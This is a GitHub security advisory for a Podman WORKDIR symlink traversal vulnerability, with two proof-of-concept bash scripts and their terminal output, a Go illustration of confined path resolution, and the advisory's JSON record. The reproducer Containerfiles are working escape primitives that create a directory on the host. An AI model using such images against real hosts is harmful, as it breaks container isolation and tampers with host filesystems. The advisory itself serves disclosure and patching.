GHSA-Q6R4-3WMG-FWCQ

Vulnerability from github – Published: 2026-06-18 14:28 – Updated: 2026-06-18 14:28
Summary
Podman: WORKDIR symlink traversal vulnerability
Details

Summary

Running a malicious container image whose WORKDIR path contains a symlink can create a directory on the host filesystem, or change the ownership of a host path. The ownership change is the less likely outcome: it requires an untrusted/malicious process that mutates the host filesystem tree while the WORKDIR path is being dereferenced, in order to win a race condition.

Patch

https://github.com/podman-container-tools/podman/commit/d18e44e9abb3bf5b7294aa70806e1368fdddfdd0

Details

This issue was fixed in podman 5.7.1 (git commit 7ce2e00ab140c11a68301f0b161f51984131a858).

PoC

The reproducer script test1.bash demonstrates the vulnerability. The directory /var/BREAKOUT is created on the host. The container process uses the container directory /var/BREAKOUT as current working directory.

The reproducer script test2.bash demonstrates the same vulnerability. The directory /var/BREAKOUT is created on the host. The container process uses the container directory /usr/local as current working directory.

The reproducer script test2.bash shows that the container's working directory can be a different path from the directory created on the host.
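As an added illustration (not part of the advisory and not podman's own code), the Go program below rebuilds the symlink layouts of both reproducers under a temporary directory and resolves each WORKDIR path two ways. NaiveResolve follows the links with ordinary host filesystem semantics (filepath.EvalSymlinks) and therefore lands in the host's /var, the behaviour the advisory reports; ResolveInRoot walks the path one component at a time, clamps every ".." at the container root and re-anchors absolute link targets there, so the result always stays under the rootfs. The function names ResolveInRoot, NaiveResolve and BuildFixture, the symlink-hop limit and the fixture itself are this example's own assumptions; the podman fix may use a different mechanism.

```go
package main

import (
	"errors"
	"fmt"
	"io/fs"
	"os"
	"path"
	"path/filepath"
	"strings"
)

// ResolveInRoot resolves containerPath (absolute, as seen from inside the
// container) against the rootfs at hostRoot. Symlinks are followed one
// component at a time; ".." and absolute link targets are confined to the
// container root. Components that do not exist yet are kept verbatim, so
// the caller can MkdirAll the result without leaving hostRoot.
func ResolveInRoot(hostRoot, containerPath string) (string, error) {
	const maxLinks = 255 // hop limit, assumed for this example (guards against link loops)
	links := 0
	cur := "/" // resolved so far, container-relative
	// Deliberately NOT path.Clean'ed first: "symlink1/../.." must be walked
	// through the link, not collapsed lexically.
	rest := strings.Split(containerPath, "/")
	for len(rest) > 0 {
		comp := rest[0]
		rest = rest[1:]
		switch comp {
		case "", ".":
			continue
		case "..":
			cur = path.Dir(cur) // path.Dir("/") == "/": clamps at the container root
			continue
		}
		next := path.Join(cur, comp)
		onHost := filepath.Join(hostRoot, filepath.FromSlash(next))
		fi, err := os.Lstat(onHost)
		if err != nil {
			if errors.Is(err, fs.ErrNotExist) {
				cur = next // not created yet; treat as a plain directory name
				continue
			}
			return "", err
		}
		if fi.Mode()&os.ModeSymlink == 0 {
			cur = next
			continue
		}
		links++
		if links > maxLinks {
			return "", fmt.Errorf("too many symlinks while resolving %q", containerPath)
		}
		target, err := os.Readlink(onHost)
		if err != nil {
			return "", err
		}
		if path.IsAbs(target) {
			cur = "/" // absolute target restarts at the *container* root, not the host root
		}
		// Queue the target's components in front of whatever is still unresolved.
		rest = append(strings.Split(target, "/"), rest...)
	}
	return filepath.Join(hostRoot, filepath.FromSlash(cur)), nil
}

// NaiveResolve is an illustrative unsafe resolver (not podman's code): it
// resolves the parent directory with host symlink semantics and appends the
// last component. A relative link with enough ".." climbs out of hostRoot.
func NaiveResolve(hostRoot, containerPath string) (string, error) {
	parent, base := path.Split(path.Clean(containerPath))
	hostParent, err := filepath.EvalSymlinks(filepath.Join(hostRoot, parent))
	if err != nil {
		return "", err
	}
	return filepath.Join(hostParent, base), nil
}

// BuildFixture recreates, under root, the symlink layouts of the advisory's
// two reproducers plus a self-referencing link (constructed for this example).
func BuildFixture(root string) error {
	steps := []func() error{
		func() error { return os.MkdirAll(filepath.Join(root, "var"), 0o755) },
		func() error { return os.Symlink("../../../../../../../var", filepath.Join(root, "symlink")) },
		func() error { return os.MkdirAll(filepath.Join(root, "0", "1", "2", "3"), 0o755) },
		func() error { return os.Symlink("1/2/3", filepath.Join(root, "0", "symlink1")) },
		func() error { return os.MkdirAll(filepath.Join(root, "0", "1", "symlink2", "var"), 0o755) },
		func() error { return os.Symlink("/usr/local", filepath.Join(root, "0", "1", "symlink2", "var", "BREAKOUT")) },
		func() error { return os.Symlink("../../../../../../..", filepath.Join(root, "symlink2")) },
		func() error { return os.Symlink("loop", filepath.Join(root, "loop")) },
	}
	for _, step := range steps {
		if err := step(); err != nil {
			return err
		}
	}
	return nil
}

func main() {
	root, err := os.MkdirTemp("", "rootfs-")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(root)
	if err := BuildFixture(root); err != nil {
		panic(err)
	}
	for _, wd := range []string{"/symlink/BREAKOUT", "/0/symlink1/../../symlink2/var/BREAKOUT"} {
		safe, err := ResolveInRoot(root, wd)
		if err != nil {
			panic(err)
		}
		naive, nerr := NaiveResolve(root, wd)
		fmt.Printf("WORKDIR %s\n  naive:    %s (err=%v, escapes root: %v)\n  confined: %s\n",
			wd, naive, nerr, !strings.HasPrefix(naive, root), safe)
	}
}
```

The second reproducer is the instructive case: cleaning the path lexically before resolving collapses `/0/symlink1/../..` to `/` and sends `symlink2` straight to the host root, whereas walking through `symlink1` first lands in `/0/1/symlink2/var/BREAKOUT`, whose absolute target `/usr/local` is re-anchored inside the rootfs. That is exactly why the container's working directory and the host-side breakout directory differ in the advisory's output.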

Reproducer test1.bash

#!/bin/bash
set -o errexit
set -o nounset

if [ -e /var/BREAKOUT ]; then
  echo error: path /var/BREAKOUT should not exist beforehand
  exit 1
fi

dir=$(mktemp -d)
cat > $dir/Containerfile << 'EOF'
FROM docker.io/library/alpine
RUN cd / && ln -s ../../../../../../../var symlink
USER 1234:1234
WORKDIR /symlink/BREAKOUT
CMD ["/bin/sh","-c","echo current working directory: $(pwd)"]
EOF

podman build -q --no-cache -t img $dir
podman run --rm localhost/img
ls -ld /var/BREAKOUT

Reproducer test2.bash

#!/bin/bash
set -o errexit
set -o nounset

if [ -e /var/BREAKOUT ]; then
  echo error: path /var/BREAKOUT should not exist beforehand
  exit 1
fi

dir=$(mktemp -d)
cat > $dir/Containerfile << 'EOF'
FROM docker.io/library/alpine
ARG breakout_dirname=/var
ARG breakout_basename=BREAKOUT
ARG produce_pwd=/usr/local
RUN mkdir -p /0/1/2/3 && \
    cd /0 && \
    ln -s 1/2/3 symlink1 && \
    mkdir -p /0/1/symlink2/${breakout_dirname} && \
    cd /0/1/symlink2/${breakout_dirname} && \
    ln -s ${produce_pwd} ${breakout_basename}
RUN cd / && ln -s ../../../../../../.. symlink2
USER 1234:1234
WORKDIR /0/symlink1/../../symlink2/${breakout_dirname}/${breakout_basename}
CMD ["/bin/sh","-c","echo current working directory: $(pwd)"]
EOF

podman build -q --no-cache -t img $dir
podman run --rm localhost/img
ls -ld /var/BREAKOUT

Vulnerable:

podman 5.7.0 using Fedora CoreOS 43.20251120.3.0

root@localhost:~# bash test1.bash 
38c27b69c61941741f49c3f87b589b422391d5908659665cabf248934be0ed80
current working directory: /var/BREAKOUT
drwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT
root@localhost:~# rmdir /var/BREAKOUT/
root@localhost:~# bash test2.bash 
c3390edbe393a3f3b182e60c5900cf93444b5120fbe34dc305478b3b77a106c9
current working directory: /usr/local
drwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT

Not vulnerable:

podman 5.7.1 using Fedora CoreOS 43.20260119.1.1

root@localhost:~# bash test1.bash 
0229bf752a821d5b9bb8afcf4b94e8de2a4838798ae8065414b7f939b81d0788
current working directory: /var/BREAKOUT
ls: cannot access '/var/BREAKOUT': No such file or directory
root@localhost:~# bash test2.bash 
568584150a93a003feb8ae1985173bf50ced9cba4d52f9734cb70dc75eeb7c60
current working directory: /usr/local
ls: cannot access '/var/BREAKOUT': No such file or directory

Credits

We would like to thank Erik Sjölund (@eriksjolund) for reporting the security impact to us.


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.7.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/containers/podman/v5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/containers/podman/v4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "4.9.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/containers/podman/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "3.4.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55686"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T14:28:26Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nRunning a malicous container image where the WORKDIR path contains a symlink can create a directory or modify ownership on the host filesystem. Modified ownership is less likely to happen as that requires help from an untrusted/malicious process that mutates the host filesystem tree during dereferencing of the WORKDIR path, to trigger a race condition.\n\n### Patch\n\nhttps://github.com/podman-container-tools/podman/commit/d18e44e9abb3bf5b7294aa70806e1368fdddfdd0\n\n### Details\n\nThis issue was fixed in podman 5.7.1 (git commit 7ce2e00ab140c11a68301f0b161f51984131a858)\n\n### PoC\n\nThe reproducer script _test1.bash_ demonstrates the vulnerability. \nThe directory  `/var/BREAKOUT` is created on the host.\nThe container process uses the container directory `/var/BREAKOUT` as current working directory.\n\nThe reproducer script _test2.bash_ demonstrates the same vulnerability. \nThe directory  `/var/BREAKOUT` is created on the host.\nThe container process uses the container directory `/usr/local` as current working directory.\n\nThe reproducer script _test2.bash_ shows that the working directory can be different from the breakout directory.\n\nReproducer **test1.bash**\n\n```\n#!/bin/bash\nset -o errexit\nset -o nounset\n\nif [ -e /var/BREAKOUT ]; then\n  echo error: path /var/BREAKOUT should not exist beforehand\n  exit 1\nfi\n\ndir=$(mktemp -d)\ncat \u003e $dir/Containerfile \u003c\u003c \u0027EOF\u0027\nFROM docker.io/library/alpine\nRUN cd / \u0026\u0026 ln -s ../../../../../../../var symlink\nUSER 1234:1234\nWORKDIR /symlink/BREAKOUT\nCMD [\"/bin/sh\",\"-c\",\"echo current working directory: $(pwd)\"]\nEOF\n\npodman build -q --no-cache -t img $dir\npodman run --rm localhost/img\nls -ld /var/BREAKOUT\n```\n\n\nReproducer **test2.bash**\n\n```\n#!/bin/bash\nset -o errexit\nset -o nounset\n\nif [ -e /var/BREAKOUT ]; then\n  echo error: path /var/BREAKOUT should not exist beforehand\n  exit 1\nfi\n\ndir=$(mktemp -d)\ncat \u003e $dir/Containerfile \u003c\u003c \u0027EOF\u0027\nFROM docker.io/library/alpine\nARG breakout_dirname=/var\nARG breakout_basename=BREAKOUT\nARG produce_pwd=/usr/local\nRUN mkdir -p /0/1/2/3 \u0026\u0026 \\\n    cd /0 \u0026\u0026 \\\n    ln -s 1/2/3 symlink1 \u0026\u0026 \\\n    mkdir -p /0/1/symlink2/${breakout_dirname} \u0026\u0026 \\\n    cd /0/1/symlink2/${breakout_dirname} \u0026\u0026 \\\n    ln -s ${produce_pwd} ${breakout_basename}\nRUN cd / \u0026\u0026 ln -s ../../../../../../.. symlink2\nUSER 1234:1234\nWORKDIR /0/symlink1/../../symlink2/${breakout_dirname}/${breakout_basename}\nCMD [\"/bin/sh\",\"-c\",\"echo current working directory: $(pwd)\"]\nEOF\n\npodman build -q --no-cache -t img $dir\npodman run --rm localhost/img\nls -ld /var/BREAKOUT\n```\n\n\n\nVulnerable:\n\npodman 5.7.0 using Fedora CoreOS 43.20251120.3.0\n\n```\nroot@localhost:~# bash test1.bash \n38c27b69c61941741f49c3f87b589b422391d5908659665cabf248934be0ed80\ncurrent working directory: /var/BREAKOUT\ndrwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT\nroot@localhost:~# rmdir /var/BREAKOUT/\nroot@localhost:~# bash test2.bash \nc3390edbe393a3f3b182e60c5900cf93444b5120fbe34dc305478b3b77a106c9\ncurrent working directory: /usr/local\ndrwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT\n```\n\nNot vulnerable:\n\npodman 5.7.1 using Fedora CoreOS 43.20260119.1.1\n\n```\nroot@localhost:~# bash test1.bash \n0229bf752a821d5b9bb8afcf4b94e8de2a4838798ae8065414b7f939b81d0788\ncurrent working directory: /var/BREAKOUT\nls: cannot access \u0027/var/BREAKOUT\u0027: No such file or directory\nroot@localhost:~# bash test2.bash \n568584150a93a003feb8ae1985173bf50ced9cba4d52f9734cb70dc75eeb7c60\ncurrent working directory: /usr/local\nls: cannot access \u0027/var/BREAKOUT\u0027: No such file or directory\n```\n\n### Credits\n\nWe like to thank Erik Sj\u00f6lund (@eriksjolund) for reporting the security impact to us.",
  "id": "GHSA-q6r4-3wmg-fwcq",
  "modified": "2026-06-18T14:28:26Z",
  "published": "2026-06-18T14:28:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/podman-container-tools/podman/security/advisories/GHSA-q6r4-3wmg-fwcq"
    },
    {
      "type": "WEB",
      "url": "https://github.com/podman-container-tools/podman/commit/7ce2e00ab140c11a68301f0b161f51984131a858"
    },
    {
      "type": "WEB",
      "url": "https://github.com/podman-container-tools/podman/commit/d18e44e9abb3bf5b7294aa70806e1368fdddfdd0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/podman-container-tools/podman"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Podman: WORKDIR symlink traversal vulnerability"
}
